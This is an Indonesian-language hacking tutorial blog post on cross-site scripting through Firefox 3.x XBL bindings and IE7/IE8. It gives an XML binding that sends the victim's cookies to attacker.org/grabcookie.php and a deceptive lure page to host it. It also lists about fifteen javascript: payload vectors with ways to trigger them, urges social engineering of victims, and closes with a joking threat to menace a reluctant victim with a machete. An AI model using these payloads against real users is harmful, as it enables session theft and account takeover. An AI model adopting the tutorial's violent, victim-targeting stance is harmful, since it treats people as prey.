Cross Site Scripting (XSS) Vulnerability pada Firefox 3.x dan IE8/IE7


firefox dan internet explorerCross Site Scripting atau XSS merupakan bugs lawas tapi berseliweran di jagad maya ini. Seperti pada tulisan sebelumnya XSS bisa berakibat aksi Cookie Stealing, Session Hijacking, atau Defacing. Biasanya pada tulisan sebelumnya kita melakukan eksploitasi XSS pada aplikasi web yang target, namun sekarang kita mengeksploitasi dengan memanfaatkan aplikasi browser firefox < 3.x yang dipakai korban, dan mencuri cookie dan disimpan diserver yang kita tentukan.

Proof of Concept on Firefox < 3.x :

Pertama kita buat sebuah script XML bernama test.xml


< ?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
 <binding id="xss">
 <implementation>
 <constructor>< !&#91;CDATA&#91;document.location='http://attacker.org/grabcookie.php?cookie='+document.cookie;&#93;&#93;>
 </constructor>
 </implementation>
 </binding>
</bindings>

dimana listing kode grabcookie.php bisa anda dapatkan pada tulisan Xplodecms Cross Site Scripting (XSS) Injection pastikan anda membuat file “enak.txt” dan kita set permission file tersebut menjadi dapat ditulis (chmod 777) lalu script test.xml kita sisipkan ke halaman web yang akan dijadikan perangkap dan ciptakan halaman web yang membuat si korban tidak tidak sadar kalau ia sedang menjadi korban.

<html>
 <title>Selamat Datang Di Web Pribadiku</title>
 <body>
 Selamat Datang Di Web Pribadiku, Semoga Web ini Bermanfaat bagi Anda🙂
 <style>BODY{-moz-binding:url("http://attacker.org/test.xml#xss")}</style>
 </body>
 </html>
<pre>

Prof of Concept on IE8/IE7 :

Pada Ie7 atau IE 8 tidak memperbolehkan menjalankan kode “javascript:[jscodz]”, tapi kita bisa mengakalinya dengan menjalankan kode dengan membukanya dengan opsi “open it in new target”

Contohnya url di bawah ini:

http://attacker.com/tesie8.htm

</pre>
<style>@import 'javascript:alert("xss1")';</style>
 <img SRC=javascript:alert('XSS2')/>
 <body BACKGROUND="javascript:alert('XSS3')">
 <link REL="stylesheet" HREF="javascript:alert('XSS4');">
 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
 
 <div STYLE="background-image: url(javascript:alert('XSS7'))">
 <style>.XSS{background-image:url("javascript:alert('XSS8')");}</style><a></a>
 <style type="text/css">BODY{background:url("javascript:alert('XSS9')")}</style>
 <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=javascript:alert('XSS10')></param></object>
 <style>@import'http://ha.ckers.org/xss.css';</style>
 <script SRC="javascript:alert('xss11');"></script>
 <video SRC="javascript:alert('xss12');"</video>
 <layer SRC="javascript:alert('xss13')"></layer>
 <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
 <applet src="javascript:alert('xss15')" type=text/html>
<pre>

ketika kita buka halaman “http://attacker.com/tesie8.htm&#8221; maka javascript tidak jalan, tapi kalau kita buka url tersebut dengan target _blank maka script tersebut akan tereksekusi.

<a href=”http://attacker.com/tesie8.htm&#8221; target=”_blank”>Bukain deh :)</a>

dan,

<iframe src=”http://attacker.com/tesie8.htm”></iframe&gt;

atau,

<script>window.open(“http://attacker.com/tesie8.htm&#8221;);</script>

Dengan Teknik Social Enginering bagaimana kreatifitas anda membuat si korban datang ke website anda dengan halus agar tidak terkesan mencurigakan bagi korban, kalau si korban bersikeras tidak mau mengunjungi web anda, segera datang kerumahnya dan membawa golok dan todongkan ujung golok ke batang hidungnya dan katakan ” HOOIII BUKA WEB GUA SEKARANG GA !!!! KALO ENGGAK GUE SUNAT LOE,, AMPE ABIIIEzz,,,!!!!!

reference :
http://www.80vul.com/